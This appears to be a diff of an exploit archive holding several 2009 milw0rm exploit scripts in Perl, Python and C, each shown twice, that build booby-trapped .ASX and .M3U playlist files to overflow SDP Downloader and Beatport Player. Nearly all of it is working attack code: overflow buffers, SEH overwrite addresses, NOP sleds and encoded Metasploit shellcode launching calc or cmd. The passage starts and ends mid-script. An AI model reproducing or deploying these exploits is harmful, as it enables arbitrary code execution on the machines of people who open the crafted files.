"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
"\x51\x92\x42\x83";
my $exploit = $header.$junk.$eip.$nopsleds.$sc;
$file = "zAx.lst";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";
# milw0rm.com [2009-03-19]


@ -1,66 +1,66 @@
#usage: exploit.py
#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm)
# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time.
print "**************************************************************************"
print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n"
print " Founder: Cyber-Zone"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
header1 = (
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
"\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f")
header2 = (
"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
"\x3E\x3C\x2F\x41\x53\x58\x3E" )
buff = "\x41" * 529
next_seh= "\x74\x06\x90\x90"
seh="\x89\x69\x01\x10" #idmmbc.dll
#seh = "\x43"*4
junk="\x44"*50000
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x56\x43\x36\x42\x30\x5a")
exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
try:
out_file = open("exploit.asx",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-04-27]
#usage: exploit.py
#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm)
# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time.
print "**************************************************************************"
print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n"
print " Founder: Cyber-Zone"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
header1 = (
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
"\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f")
header2 = (
"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
"\x3E\x3C\x2F\x41\x53\x58\x3E" )
buff = "\x41" * 529
next_seh= "\x74\x06\x90\x90"
seh="\x89\x69\x01\x10" #idmmbc.dll
#seh = "\x43"*4
junk="\x44"*50000
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x56\x43\x36\x42\x30\x5a")
exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
try:
out_file = open("exploit.asx",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-04-27]


@ -1,86 +1,86 @@
/* SDP-BOF.c
* SDP Downloader Local Buffer overflow exploit [SEH]
* Credits : Cyber-Zone
* Exploit BY :
* SimO-s0fT (maroc-anti-connexion@hotmail.com)
* Shoot to : Stack & r1z & Str0ke
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 529
#define NOP 0x90
char head1[]=
"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e"
"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54"
"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49"
"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d"
"\x22\x68\x74\x74\x70\x3a\x2f\x2f";
char head2[]=
"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59"
"\x3e\x3c\x2f\x41\x53\x58\x3e";
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a";
int main(int argc, char *argv[]){
FILE *p;
unsigned char *buffer;
int n_seh=0x909010eb;
int seh=0x7C87DE34;
int i=0;
if(argc!=2){
fprintf(stdout,"_______________________________________________________________________\n");
fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n");
printf("\tUSAGE : %s filename.asx\n",argv[0]);
fprintf(stdout,"_________________________________________________________________________\n");
}
if((p=fopen(argv[1],"w+b"))==NULL){
perror("error");
return EXIT_FAILURE;
}
buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memcpy(buffer,head1, strlen(head1));
i=OFFSET;
memcpy(buffer+strlen(head1)+i, &n_seh,4);
i+=4;
memcpy(buffer+strlen(head1)+i,&seh,4);
i+=4;
memset(buffer+strlen(head1)+i,0x90,10);
i+=10;
memcpy(buffer+strlen(head1)+i,scode,strlen(scode));
i+=strlen(scode);
memcpy(buffer+strlen(head1)+i,head2,strlen(head2));
i+=strlen(head2);
fputs(buffer,p);
fclose(p);
printf("%s has benn created !! \n Have fun \n DONE");
return 0x0;
}
// milw0rm.com [2009-04-27]
/* SDP-BOF.c
* SDP Downloader Local Buffer overflow exploit [SEH]
* Credits : Cyber-Zone
* Exploit BY :
* SimO-s0fT (maroc-anti-connexion@hotmail.com)
* Shoot to : Stack & r1z & Str0ke
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 529
#define NOP 0x90
char head1[]=
"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e"
"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54"
"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49"
"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d"
"\x22\x68\x74\x74\x70\x3a\x2f\x2f";
char head2[]=
"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59"
"\x3e\x3c\x2f\x41\x53\x58\x3e";
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a";
int main(int argc, char *argv[]){
FILE *p;
unsigned char *buffer;
int n_seh=0x909010eb;
int seh=0x7C87DE34;
int i=0;
if(argc!=2){
fprintf(stdout,"_______________________________________________________________________\n");
fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n");
printf("\tUSAGE : %s filename.asx\n",argv[0]);
fprintf(stdout,"_________________________________________________________________________\n");
}
if((p=fopen(argv[1],"w+b"))==NULL){
perror("error");
return EXIT_FAILURE;
}
buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memcpy(buffer,head1, strlen(head1));
i=OFFSET;
memcpy(buffer+strlen(head1)+i, &n_seh,4);
i+=4;
memcpy(buffer+strlen(head1)+i,&seh,4);
i+=4;
memset(buffer+strlen(head1)+i,0x90,10);
i+=10;
memcpy(buffer+strlen(head1)+i,scode,strlen(scode));
i+=strlen(scode);
memcpy(buffer+strlen(head1)+i,head2,strlen(head2));
i+=strlen(head2);
fputs(buffer,p);
fclose(p);
printf("%s has benn created !! \n Have fun \n DONE");
return 0x0;
}
// milw0rm.com [2009-04-27]


@ -1,39 +1,39 @@
#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8588\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 1232
next_seh = "\xEB\x06\x90\x90"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
exploit = buff + next_seh + seh + shellcode
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-05-01]
#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8588\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 1232
next_seh = "\xEB\x06\x90\x90"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
exploit = buff + next_seh + seh + shellcode
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-05-01]


@ -1,49 +1,49 @@
#exploit.py
#
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Tested on : Windows xp sp2
#
chars = "\x41" * 1232
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72"
nops = "\x90" * 20
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351
Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58"
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36"
"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a")
file=open('Devil_inside.m3u','w')
file.write(chars+ns+sh+nops+shellcode)
file.close()
# milw0rm.com [2009-05-01]
#exploit.py
#
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Tested on : Windows xp sp2
#
chars = "\x41" * 1232
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72"
nops = "\x90" * 20
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351
Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58"
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36"
"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a")
file=open('Devil_inside.m3u','w')
file.write(chars+ns+sh+nops+shellcode)
file.close()
# milw0rm.com [2009-05-01]


@ -1,29 +1,29 @@
#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled = "\x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
$junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
"\r\n";
close $playlist;
# milw0rm.com [2009-05-01]
#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
